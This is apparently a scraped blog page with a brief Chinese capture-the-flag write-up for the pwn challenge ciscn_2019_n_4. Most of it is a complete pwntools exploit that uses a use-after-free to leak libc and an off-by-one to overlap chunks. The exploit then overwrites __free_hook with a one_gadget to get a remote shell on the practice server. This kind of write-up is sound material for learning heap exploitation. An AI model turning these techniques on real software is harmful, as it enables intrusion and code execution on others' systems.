zoukankan      html  css  js  c++  java
  • ciscn_2019_n_4

    漏洞点还挺多的

    uaf+off-by-one

    通过uaf泄露libc,通过off-by-one达成overlap,来double free劫持free_hook即可

    from pwn import *
    
    #p=process('./ciscn_2019_n_4')
    p=remote('node3.buuoj.cn',25496)
    libc=ELF('/lib/x86_64-linux-gnu/libc-2.27.so')
    text='Your choice :'
    def add(size,content):
        p.sendlineafter(':','1')
        p.sendlineafter(' ?',str(size))
        p.sendlineafter('nest?',content)
    
    def edit(idx,content):
        p.sendlineafter(':','2')
        p.sendlineafter(' :',str(idx))
        p.sendlineafter('nest?',content)
    
    def show(idx):
        p.sendlineafter(':','3')
        p.sendlineafter('Index :',str(idx))
    
    def delete(idx):
        p.sendlineafter(':','4')
        p.sendlineafter('Index :',str(idx))
    
    add(0x410,'p')#0
    add(0x10,'p')#1
    
    delete(0)
    add(0x18,'ppppppp')#0
    show(0)
    print(hex(libc.symbols['__malloc_hook']))
    libc.address=u64(p.recvuntil('x7f')[-6:].ljust(8,b'x00'))-1120-libc.symbols['__malloc_hook']
    
    add(0x10,'p')#2
    add(0x10,'p')#3
    add(0x10,'p')#4
    
    one=libc.address+0x4f322
    free_hook=libc.symbols['__free_hook']
    edit(0,b'z'*0x10+p64(0x40)+b'x81')#0
    print(hex(libc.address))
    delete(2)
    delete(3)
    add(0x71,b'p'*0x18+p64(0x21)+p64(free_hook))#2
    delete(2)
    add(0x10,'p')
    add(0x10,p64(one))
    #gdb.attach(p)
    p.interactive()
  • 相关阅读:
    中国剩余定理及拓展
    20191128-1 总结
    获取动态图
    弹球游戏设计
    作业要求 20191121-1 每周例行报告
    作业要求 20191114-1 每周例行报告
    对现组内成员的感谢
    作业要求 20191107-1 每周例行报告
    20191031-1 每周例行报告
    作业要求 20191024-1每周例行报告
  • 原文地址:https://www.cnblogs.com/pppyyyzzz/p/14514657.html
Copyright © 2011-2022 走看看